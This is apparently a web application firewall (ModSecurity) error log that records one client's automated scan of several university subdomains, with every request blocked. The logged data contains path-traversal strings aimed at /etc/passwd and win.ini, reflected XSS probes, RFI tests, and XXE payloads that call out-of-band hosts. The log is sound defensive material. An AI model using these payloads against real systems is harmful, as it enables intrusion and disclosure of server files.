[Tue Aug 29 11:41:20.393709 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdAAAAAM"]
[Tue Aug 29 11:41:20.397098 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAcqJMYAAAAG"]
[Tue Aug 29 11:41:20.440609 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAc4EmoAAAAP"]
[Tue Aug 29 11:41:20.449486 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAcqJMgAAAAG"]
[Tue Aug 29 11:41:20.540581 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc4EmsAAAAP"]
[Tue Aug 29 11:41:20.603293 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAcyp4UAAAAK"]
[Tue Aug 29 11:41:20.605025 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAaZ9rEAAAAo"]
[Tue Aug 29 11:41:20.637659 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAaZ9rIAAAAo"]
[Tue Aug 29 11:41:20.643091 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc0NdYAAAAM"]
[Tue Aug 29 11:41:20.646106 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc4Em4AAAAP"]
[Tue Aug 29 11:41:20.687412 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAc0NdgAAAAM"]
[Tue Aug 29 11:41:20.694347 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO128MCo-f0AAAcyp4cAAAAK"]
[Tue Aug 29 11:41:20.713193 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdkAAAAM"]
[Tue Aug 29 11:41:20.717327 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcyp4gAAAAK"]
[Tue Aug 29 11:41:20.735719 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdoAAAAM"]
[Tue Aug 29 11:41:20.747170 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAaZ9rUAAAAo"]
[Tue Aug 29 11:41:20.763263 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcyp4oAAAAK"]
[Tue Aug 29 11:41:20.775452 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAcqJNEAAAAG"]
[Tue Aug 29 11:41:20.777500 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc0NdwAAAAM"]
[Tue Aug 29 11:41:20.798283 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcqJNIAAAAG"]
[Tue Aug 29 11:41:21.399433 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAc4EncAAAAP"]
[Tue Aug 29 11:41:21.539627 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gwd8gm6nxab87m.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NeYAAAAM"]
[Tue Aug 29 11:41:21.579306 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gkkf45ys4wd1a6.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NegAAAAM"]
[Tue Aug 29 11:41:21.670337 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gr5dq3d4as41if.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NewAAAAM"]
[Tue Aug 29 11:41:21.761251 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26grhue9ip6czxic.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NfAAAAAM"]
[Tue Aug 29 11:41:21.963418 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26g1ao9rfq1fis3i.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAcqJNcAAAAG"]
[Tue Aug 29 11:41:21.988035 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAaZ9r4AAAAo"]
[Tue Aug 29 11:41:22.021576 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128sCo-f0AAAcqJNoAAAAG"]
[Tue Aug 29 11:41:22.036482 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128sCo-f0AAAQkBbAAAAAC"]
[Tue Aug 29 11:41:22.051392 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128sCo-f0AAAaZ9sEAAAAo"]
[Tue Aug 29 11:41:22.427588 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128sCo-f0AAAaZ9sMAAAAo"]
[Tue Aug 29 11:41:22.447989 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26ghtzz8bkmsftfn.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128sCo-f0AAAUKhEwAAABC"]
[Tue Aug 29 11:41:22.487021 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO128sCo-f0AAAcqJOAAAAAG"]
[Tue Aug 29 11:41:22.495492 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128sCo-f0AAAaZ9sYAAAAo"]
[Tue Aug 29 11:41:22.509205 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAcqJOEAAAAG"]
[Tue Aug 29 11:41:22.529573 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAcqJOIAAAAG"]
[Tue Aug 29 11:41:22.567874 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAActbL4AAAAH"]
